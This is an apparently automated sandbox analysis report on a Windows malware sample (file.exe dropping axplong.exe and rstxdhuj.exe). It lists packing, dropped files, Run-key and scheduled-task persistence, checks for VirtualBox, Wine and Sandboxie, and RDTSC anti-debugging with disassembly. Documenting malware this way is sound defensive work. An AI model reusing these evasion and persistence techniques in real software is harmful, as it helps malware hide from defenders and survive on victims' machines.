Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 0000000B.00000002.2669648300.0000000000EF7000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ekhnjnoj:EW;kroqoubj:EW;.taggant:EW;
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
Source: 10.2.rstxdhuj.exe.35c1570.4.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
Source: Yara match File source: 10.2.rstxdhuj.exe.5a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2025753148.0000000005A30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: Ylrdnrwcx.exe.10.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1de814 should be: 0x1d51c6
Source: rstxdhuj.exe.9.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: rstxdhuj[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0xfbc7f
Source: file.exe Static PE information: real checksum: 0x1de814 should be: 0x1d51c6
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: ekhnjnoj
Source: file.exe Static PE information: section name: kroqoubj
Source: file.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: ekhnjnoj
Source: axplong.exe.0.dr Static PE information: section name: kroqoubj
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: 5[1].exe.9.dr Static PE information: section name: .xdata
Source: 5.exe.9.dr Static PE information: section name: .xdata
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_0021D84C push ecx; ret 9_2_0021D85F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_0597301E pushad ; retf 10_2_05973031
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05972EA7 push esp; retf 10_2_05972EA8
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05AD6428 push eax; iretd 10_2_05AD6429
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05ADEC10 pushfd ; retf 10_2_05ADEC11
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05BA052E push cs; ret 10_2_05BA052F
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Code function: 10_2_05E26500 push edi; iretd 10_2_05E26506
Source: file.exe Static PE information: section name: entropy: 7.979840266665317
Source: file.exe Static PE information: section name: ekhnjnoj entropy: 7.953325357730412
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979840266665317
Source: axplong.exe.0.dr Static PE information: section name: ekhnjnoj entropy: 7.953325357730412
Source: rstxdhuj.exe.9.dr Static PE information: section name: .text entropy: 7.989713684706289
Source: rstxdhuj[1].exe.9.dr Static PE information: section name: .text entropy: 7.989713684706289
Source: Ylrdnrwcx.exe.10.dr Static PE information: section name: .text entropy: 7.989713684706289
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\5[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\rstxdhuj[1].exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File created: C:\Users\user\AppData\Local\Temp\1000343001\5.exe
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe File created: C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: rstxdhuj.exe PID: 2156, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: rstxdhuj.exe, 0000000A.00000002.2005733540.0000000002591000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B04 second address: A42B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B08 second address: A42B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B0E second address: A42B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42B14 second address: A42B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C7A second address: A42C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C80 second address: A42C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C8B second address: A42C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C91 second address: A42C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A42C95 second address: A42C9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430BA second address: A430C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430C0 second address: A430E5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAC4EBB26h 0x00000008 jmp 00007FAAAC4EBB2Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jnl 00007FAAAC4EBB26h 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A430E5 second address: A430F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FAAAC4EC6A6h 0x0000000a jg 00007FAAAC4EC6A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A45417 second address: A45442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FAAAC4EBB26h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAAAC4EBB39h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88DFF second address: A88E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88E04 second address: A88E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89D82 second address: A89D87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89D87 second address: A89DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+1245195Ah] 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 mov ax, si 0x00000017 and ecx, 2658E033h 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FAAAC4EC6A8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FAAAC4EC6B0h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86EA3 second address: A86EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB39h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87F98 second address: A8802B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov ebx, eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FAAAC4EC6A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov edi, dword ptr [ebp+122D2C55h] 0x0000003c mov eax, dword ptr [ebp+122D111Dh] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FAAAC4EC6A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c jl 00007FAAAC4EC6ABh 0x00000062 mov ebx, 401E9D58h 0x00000067 mov edi, dword ptr [ebp+122D294Dh] 0x0000006d push FFFFFFFFh 0x0000006f xor di, 9712h 0x00000074 push eax 0x00000075 jnl 00007FAAAC4EC6B4h 0x0000007b pushad 0x0000007c jns 00007FAAAC4EC6A6h 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BE91 second address: A8BEC3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAAC4EBB2Eh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FAAAC4EBB32h 0x00000010 jmp 00007FAAAC4EBB2Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2830E second address: A28314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89F27 second address: A89F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89F2D second address: A89F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C47D second address: A8C48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C48A second address: A8C490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C490 second address: A8C495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C495 second address: A8C4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAAAC4EC6A6h 0x00000009 jne 00007FAAAC4EC6A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1B6Dh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FAAAC4EC6A8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov edi, dword ptr [ebp+122D2E4Fh] 0x0000003b xor ebx, dword ptr [ebp+1244A75Ch] 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 pushad 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D644 second address: A8D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D83B second address: A8D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
